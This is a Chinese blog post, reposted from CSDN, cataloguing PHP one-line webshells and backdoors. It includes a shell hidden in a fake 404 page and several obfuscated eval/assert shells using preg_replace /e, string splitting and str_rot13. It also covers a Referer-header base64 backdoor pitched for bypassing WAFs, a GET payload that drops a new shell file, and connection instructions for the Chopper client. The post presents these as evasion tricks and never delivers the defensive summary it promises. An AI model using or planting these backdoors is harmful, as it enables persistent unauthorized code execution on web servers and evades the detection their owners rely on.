当前位置: > 技术分享 > php 一句话木马、后门
导航下通栏区域

php 一句话木马、后门

强悍的PHP一句话后门

这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。

利用404页面隐藏PHP小马:

[php] view plain copy

  1. <strong><!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  2. <html><head>
  3. <title>404 Not Found</title>
  4. </head><body>
  5. <h1>Not Found</h1>
  6. <p>The requested URL was not found on this server.</p>
  7. </body></html>
  8. <?php
  9. @preg_replace("/[pageerror]/e",$_POST['error'],"saft");
  10. header('HTTP/1.1 404 Not Found');
  11. ?></strong>


404页面是网站常用的文件,一般建议好后很少有人会去对它进行检查修改,这时我们可以利用这一点进行隐藏后门。

无特征隐藏PHP一句话:

[php] view plain copy

  1. <strong><?php
  2. session_start();
  3. $_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
  4. $_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');</strong>

 

 

将$_POST['code']的内容赋值给$_SESSION['theCode'],然后执行$_SESSION['theCode'],亮点是没有特征码。用扫描工具来检查代码的话,是不会报警的,达到目的了。

超级隐蔽的PHP后门:

[php] view plain copy

  1. <strong><?php $_GET[a]($_GET[b]);?></strong>

 

仅用GET函数就构成了木马;

利用方法:

?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};

执行后当前目录生成c.php一句话木马,当传参a为eval时会报错木马生成失败,为assert时同样报错,但会生成木马,真可谓不可小视,简简单单的一句话,被延伸到这般应用。

层级请求,编码运行PHP后门:
此方法用两个文件实现,文件1

[php] view plain copy

  1. <?php
  2. //1.php
  3. header('Content-type:text/html;charset=utf-8');
  4. parse_str($_SERVER['HTTP_REFERER'], $a);
  5. if(reset($a) == '10' && count($a) == 9) {
  6.    eval(base64_decode(str_replace(" ""+", implode(array_slice($a, 6)))));
  7. }

 

文件2

[php] view plain copy

  1. <?php
  2. //2.php
  3. header('Content-type:text/html;charset=utf-8');
  4. //要执行的代码
  5. $code = <<<CODE
  6. phpinfo();
  7. CODE;
  8. //进行base64编码
  9. $code = base64_encode($code);
  10. //构造referer字符串
  11. $referer = "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
  12. //后门url
  13. $url = 'http://localhost/test1/1.php';
  14. $ch = curl_init();
  15. $options = array(
  16.     CURLOPT_URL => $url,
  17.     CURLOPT_HEADER => FALSE,
  18.     CURLOPT_RETURNTRANSFER => TRUE,
  19.     CURLOPT_REFERER => $referer
  20. );
  21. curl_setopt_array($ch$options);
  22. echo curl_exec($ch);

 

通过HTTP请求中的HTTP_REFERER来运行经过base64编码的代码,来达到后门的效果,一般waf对referer这些检测要松一点,或者没有检测。用这个思路bypass waf不错。

PHP后门生成工具weevely

weevely是一款针对PHP的webshell的自由软件,可用于模拟一个类似于telnet的连接shell,weevely通常用于web程序的漏洞利用,隐藏后门或者使用类似telnet的方式来代替web 页面式的管理,weevely生成的服务器端php代码是经过了base64编码的,所以可以骗过主流的杀毒软件和IDS,上传服务器端代码后通常可以通过weevely直接运行。

weevely所生成的PHP后门所使用的方法是现在比较主流的base64加密结合字符串变形技术,后门中所使用的函数均是常用的字符串处理函数,被作为检查规则的eval,system等函数都不会直接出现在代码中,从而可以致使后门文件绕过后门查找工具的检查。使用暗组的Web后门查杀工具进行扫描,结果显示该文件无任何威胁。

三个变形的一句话PHP木马
第一个

[php] view plain copy

  1. <?php ($_=@$_GET[2]).@$_($_POST[1])?>

 

在菜刀里写http://site/1.php?2=assert密码是1

第二个

[php] view plain copy

  1. <?php
  2. $_="";
  3. $_[+""]='';
  4. $_="$_"."";
  5. $_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
  6. ?>
  7. <?php ${'_'.$_}['_'](${'_'.$_}['__']);?>

 

在菜刀里写http://site/2.php?_=assert&__=eval($_POST['pass']) 密码是pass。如果你用菜刀的附加数据的话更隐蔽,或者用其它注射工具也可以,因为是post提交的。

第三个

[php] view plain copy

  1. <span style="font-size:12px;font-variant:inherit; line-height:inherit">($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)''add');</span>

 

str_rot13(‘riny’)即编码后的eval,完全避开了关键字,又不失效果,让人吐血!

最后列几个高级的PHP一句话木马后门:

[php] view plain copy

  1. <strong>1、
  2. $hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
  3. $hh("/[discuz]/e",$_POST['h'],"Access");
  4. //菜刀一句话
  5. 2、
  6. $filename=$_GET['xbid'];
  7. include ($filename);
  8. //危险的include函数,直接编译任何文件为php格式运行
  9. 3、
  10. $reg="c"."o"."p"."y";
  11. $reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
  12. //重命名任何文件
  13. 4、
  14. $gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
  15. $gzid("/[discuz]/e",$_POST['h'],"Access");
  16. //菜刀一句话
  17. 5、include ($uid);
  18. //危险的include函数,直接编译任何文件为php格式运行,POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif
  19. //gif插一句话
  20. 6、典型一句话
  21. 程序后门代码
  22. <?php eval_r($_POST[sb])?>
  23. 程序代码
  24. <?php @eval_r($_POST[sb])?>
  25. //容错代码
  26. 程序代码
  27. <?php assert($_POST[sb]);?>
  28. //使用lanker一句话客户端的专家模式执行相关的php语句
  29. 程序代码
  30. <?$_POST['sa']($_POST['sb']);?>
  31. 程序代码
  32. <?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
  33. 程序代码
  34. <?php
  35. @preg_replace("/[email]/e",$_POST['h'],"error");
  36. ?>
  37. //使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
  38. 程序代码
  39. <O>h=@eval_r($_POST1);</O>
  40. 程序代码
  41. <script language="php">@eval_r($_POST[sb])</script>
  42. //绕过<?限制的一句话</strong>

 

综上,这些PHP一句话后门可谓五脏俱全,一不小心您肯定中招了,而我们今天这篇文章的重中之重在哪呢?重点就在下边的总结!

 

转载:https://blog.csdn.net/zhongdajiajiao/article/details/52275822

php 一句话木马、后门:等您坐沙发呢!

发表评论

表情
还能输入210个字